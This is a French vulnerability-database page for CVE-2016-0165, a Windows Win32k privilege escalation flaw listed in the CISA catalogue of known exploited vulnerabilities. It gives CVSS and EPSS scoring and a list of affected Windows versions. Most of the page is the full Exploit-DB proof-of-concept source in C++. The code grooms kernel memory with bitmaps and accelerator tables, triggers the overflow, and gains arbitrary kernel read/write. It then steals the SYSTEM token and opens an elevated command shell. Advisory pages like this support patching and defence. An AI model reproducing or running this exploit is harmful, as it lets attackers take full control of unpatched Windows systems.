Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE Other |
No informations. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V3.1 |
7.8 |
HIGH |
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
|
[email protected] |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
CISA KEV (Vulnérabilités Exploitées Connues)
Nom de la vulnérabilité : Microsoft Win32k Privilege Escalation Vulnerability
Action requise : Apply updates per vendor instructions.
Connu pour être utilisé dans des campagnes de ransomware : Unknown
Ajouter le : 2023-06-21 22h00 +00:00
Action attendue : 2023-07-12 22h00 +00:00
Informations importantes
Ce CVE est identifié comme vulnérable et constitue une menace active, selon le Catalogue des Vulnérabilités Exploitées Connues (CISA KEV). La CISA a répertorié cette vulnérabilité comme étant activement exploitée par des cybercriminels, soulignant ainsi l'importance de prendre des mesures immédiates pour remédier à cette faille. Il est impératif de prioriser la mise à jour et la correction de ce CVE afin de protéger les systèmes contre les potentielles cyberattaques.
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 44480
Date de publication : 2018-02-28 23h00 +00:00
Auteur : xiaodaozhi
EDB Vérifié : No
#include <Windows.h>
#include <wingdi.h>
#include <iostream>
#include <Psapi.h>
#pragma comment(lib, "psapi.lib")
#define POCDEBUG 0
#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif
static HBITMAP hBmpHunted = NULL;
static HBITMAP hBmpExtend = NULL;
static DWORD iMemHunted = NULL;
static PDWORD pBmpHunted = NULL;
CONST LONG maxCount = 0x6666667;
CONST LONG maxLimit = 0x04E2000;
CONST LONG maxTimes = 4000;
CONST LONG tmpTimes = 5500;
static POINT point[maxCount] = { 0, 0 };
static HBITMAP hbitmap[maxTimes] = { NULL };
static HACCEL hacctab[tmpTimes] = { NULL };
CONST LONG iExtHeight = 948;
CONST LONG iExtpScan0 = 951;
static
VOID
xxCreateClipboard(DWORD Size)
{
PBYTE Buffer = (PBYTE)malloc(Size);
FillMemory(Buffer, Size, 0x41);
Buffer[Size - 1] = 0x00;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, (SIZE_T)Size);
CopyMemory(GlobalLock(hMem), Buffer, (SIZE_T)Size);
GlobalUnlock(hMem);
SetClipboardData(CF_TEXT, hMem);
}
static
BOOL xxPoint(LONG id, DWORD Value)
{
LONG iLeng = 0x00;
pBmpHunted[id] = Value;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
{
LONG iLeng = 0;
pBmpHunted[iExtpScan0] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
iLeng = SetBitmapBits(hBmpExtend, cb, pvBits);
if (iLeng < (LONG)cb)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
{
LONG iLeng = 0;
pBmpHunted[iExtpScan0] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
iLeng = GetBitmapBits(hBmpExtend, cb, pvBits);
if (iLeng < (LONG)cb)
{
return FALSE;
}
return TRUE;
}
static
VOID xxInitPoints(VOID)
{
for (LONG i = 0; i < maxCount; i++)
{
point[i].x = (i % 2) + 1;
point[i].y = 100;
}
for (LONG i = 0; i < 75; i++)
{
point[i].y = i + 1;
}
}
static
BOOL xxDrawPolyLines(HDC hdc)
{
for (LONG i = maxCount; i > 0; i -= min(maxLimit, i))
{
// std::cout << ":" << (PVOID)i << std::endl;
if (!PolylineTo(hdc, &point[maxCount - i], min(maxLimit, i)))
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
if (hbitmap[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxCreateAcceleratorTables(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < tmpTimes; i++)
{
ACCEL acckey[0x0D] = { 0 };
hacctab[i] = CreateAcceleratorTableA(acckey, 0x0D);
if (hacctab[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxDeleteBitmaps(VOID)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
bReturn = DeleteObject(hbitmap[i]);
hbitmap[i] = NULL;
}
return bReturn;
}
static
VOID xxCreateClipboards(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
xxCreateClipboard(0xB5C);
}
}
static
BOOL xxDigHoleInAcceleratorTables(LONG b, LONG e)
{
BOOL bReturn = FALSE;
for (LONG i = b; i < e; i++)
{
bReturn = DestroyAcceleratorTable(hacctab[i]);
hacctab[i] = NULL;
}
return bReturn;
}
static
VOID xxDeleteAcceleratorTables(VOID)
{
for (LONG i = 0; i < tmpTimes; i++)
{
if (hacctab[i] == NULL)
{
continue;
}
DestroyAcceleratorTable(hacctab[i]);
hacctab[i] = NULL;
}
}
static
BOOL xxRetrieveBitmapBits(VOID)
{
pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
ZeroMemory(pBmpHunted, 0x1000);
LONG index = -1;
LONG iLeng = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
if (iLeng < 0x2D0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpHunted = hbitmap[i];
break;
}
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
BOOL xxGetExtendPalette(VOID)
{
PVOID pBmpExtend = malloc(0x1000);
LONG index = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
if (hbitmap[i] == hBmpHunted)
{
continue;
}
if (GetBitmapBits(hbitmap[i], 0x1000, pBmpExtend) < 0x2D0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpExtend = hbitmap[i];
break;
}
free(pBmpExtend);
pBmpExtend = NULL;
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
VOID xxOutputBitmapBits(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++)
{
std::cout << '[';
std::cout.fill('0');
std::cout.width(4);
std::cout << i << ']' << (PVOID)pBmpHunted[i];
if (((i + 1) % 4) != 0)
{
std::cout << " ";
}
else
{
std::cout << std::endl;
}
}
std::cout.width(0);
}
static
BOOL xxFixHuntedPoolHeader(VOID)
{
DWORD szInputBit[0x100] = { 0 };
CONST LONG iTrueCbdHead = 205;
CONST LONG iTrueBmpHead = 937;
szInputBit[0] = pBmpHunted[iTrueCbdHead + 0];
szInputBit[1] = pBmpHunted[iTrueCbdHead + 1];
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
bReturn = xxPointToHit(iMemHunted + 0xb70, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxFixHuntedBitmapObject(VOID)
{
DWORD szInputBit[0x100] = { 0 };
szInputBit[0] = (DWORD)hBmpHunted;
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0xb78, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
bReturn = xxPointToHit(iMemHunted + 0xb8c, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
DWORD_PTR
xxGetNtoskrnlAddress(VOID)
{
DWORD_PTR AddrList[500] = { 0 };
DWORD cbNeeded = 0;
EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
return AddrList[0];
}
static
DWORD_PTR
xxGetSysPROCESS(VOID)
{
DWORD_PTR Module = 0x00;
DWORD_PTR NtAddr = 0x00;
Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
FreeLibrary((HMODULE)Module);
NtAddr = NtAddr - Module;
Module = xxGetNtoskrnlAddress();
if (Module == 0x00)
{
return 0x00;
}
NtAddr = NtAddr + Module;
if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)))
{
return 0x00;
}
return NtAddr;
}
CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;
static
DWORD_PTR
xxGetTarPROCESS(DWORD_PTR SysPROC)
{
if (SysPROC == 0x00)
{
return 0x00;
}
DWORD_PTR point = SysPROC;
DWORD_PTR value = 0x00;
do
{
value = 0x00;
xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
if (value == GetCurrentProcessId())
{
return point;
}
value = 0x00;
xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
point = value - off_EPROCESS_ActiveLinks;
if (point == SysPROC)
{
break;
}
} while (TRUE);
return 0x00;
}
CONST LONG off_EPROCESS_Token = 0x0f8;
static DWORD_PTR dstToken = 0x00;
static DWORD_PTR srcToken = 0x00;
static
BOOL
xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
// get target process original token pointer
xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
if (dstToken == 0x00)
{
return FALSE;
}
// get system process token pointer
xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
if (srcToken == 0x00)
{
return FALSE;
}
// modify target process token pointer to system
xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
// just test if the modification is successful
DWORD_PTR tmpToken = 0x00;
xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
if (tmpToken != srcToken)
{
return FALSE;
}
return TRUE;
}
static
BOOL
xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
if (dstToken == 0x00 || srcToken == 0x00)
{
return FALSE;
}
// recover the original token pointer to target process
xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
return TRUE;
}
static
VOID xxCreateCmdLineProcess(VOID)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
static
VOID xxPrivilegeElevation(VOID)
{
BOOL bReturn = FALSE;
do
{
DWORD SysPROC = 0x0;
DWORD TarPROC = 0x0;
POCDEBUG_BREAK();
SysPROC = xxGetSysPROCESS();
if (SysPROC == 0x00)
{
break;
}
std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
POCDEBUG_BREAK();
TarPROC = xxGetTarPROCESS(SysPROC);
if (TarPROC == 0x00)
{
break;
}
std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
POCDEBUG_BREAK();
bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
POCDEBUG_BREAK();
xxCreateCmdLineProcess();
POCDEBUG_BREAK();
std::cout << "RECOVER TOKEN..." << std::endl;
bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << "FAILED" << std::endl;
}
}
INT POC_CVE20160165(VOID)
{
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2016-0165" << std::endl;
std::cout << "-------------------" << std::endl;
BOOL bReturn = FALSE;
do
{
std::cout << "INIT POINTS..." << std::endl;
xxInitPoints();
HDC hdc = GetDC(NULL);
std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
if (hdc == NULL)
{
bReturn = FALSE;
break;
}
std::cout << "BEGIN DC PATH..." << std::endl;
bReturn = BeginPath(hdc);
if (!bReturn)
{
break;
}
std::cout << "DRAW POLYLINES..." << std::endl;
bReturn = xxDrawPolyLines(hdc);
if (!bReturn)
{
break;
}
std::cout << "ENDED DC PATH..." << std::endl;
bReturn = EndPath(hdc);
if (!bReturn)
{
break;
}
std::cout << "CREATE BITMAPS (1)..." << std::endl;
bReturn = xxCreateBitmaps(0xE34, 0x01, 8);
if (!bReturn)
{
break;
}
std::cout << "CREATE ACCTABS (1)..." << std::endl;
bReturn = xxCreateAcceleratorTables();
if (!bReturn)
{
break;
}
std::cout << "DELETE BITMAPS (1)..." << std::endl;
xxDeleteBitmaps();
std::cout << "CREATE CLIPBDS (1)..." << std::endl;
xxCreateClipboards();
std::cout << "CREATE BITMAPS (2)..." << std::endl;
bReturn = xxCreateBitmaps(0x01, 0xB1, 32);
std::cout << "DELETE ACCTABS (H)..." << std::endl;
xxDigHoleInAcceleratorTables(2000, 4000);
std::cout << "PATH TO REGION..." << std::endl;
POCDEBUG_BREAK();
HRGN hrgn = PathToRegion(hdc);
if (hrgn == NULL)
{
bReturn = FALSE;
break;
}
std::cout << "DELETE REGION..." << std::endl;
DeleteObject(hrgn);
std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
bReturn = xxRetrieveBitmapBits();
if (!bReturn)
{
break;
}
// std::cout << "OUTPUT BITMAP BITS..." << std::endl;
// xxOutputBitmapBits();
std::cout << "MODIFY EXTEND BITMAP HEIGHT..." << std::endl;
POCDEBUG_BREAK();
bReturn = xxPoint(iExtHeight, 0xFFFFFFFF);
if (!bReturn)
{
break;
}
std::cout << "LOCATE EXTEND BITMAP..." << std::endl;
bReturn = xxGetExtendPalette();
if (!bReturn)
{
break;
}
if ((pBmpHunted[iExtpScan0] & 0xFFF) != 0x00000CCC)
{
bReturn = FALSE;
std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtpScan0] << std::endl;
break;
}
iMemHunted = (pBmpHunted[iExtpScan0] & ~0xFFF) - 0x1000;
std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
bReturn = xxFixHuntedPoolHeader();
if (!bReturn)
{
break;
}
std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
bReturn = xxFixHuntedBitmapObject();
if (!bReturn)
{
break;
}
std::cout << "-------------------" << std::endl;
std::cout << "PRIVILEGE ELEVATION" << std::endl;
std::cout << "-------------------" << std::endl;
xxPrivilegeElevation();
std::cout << "-------------------" << std::endl;
std::cout << "DELETE BITMAPS (2)..." << std::endl;
xxDeleteBitmaps();
std::cout << "DELETE ACCTABS (3)..." << std::endl;
xxDeleteAcceleratorTables();
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << GetLastError() << std::endl;
}
std::cout << "-------------------" << std::endl;
getchar();
return 0;
}
INT main(INT argc, CHAR *argv[])
{
POC_CVE20160165();
return 0;
}
Products Mentioned
Configuraton 0
Microsoft>>Windows_10 >> Version -
Microsoft>>Windows_10 >> Version 1511
Microsoft>>Windows_7 >> Version -
Microsoft>>Windows_8.1 >> Version *
Microsoft>>Windows_rt_8.1 >> Version -
Microsoft>>Windows_server_2008 >> Version -
Microsoft>>Windows_server_2008 >> Version r2
Microsoft>>Windows_server_2012 >> Version -
Microsoft>>Windows_server_2012 >> Version r2
Microsoft>>Windows_vista >> Version -
Références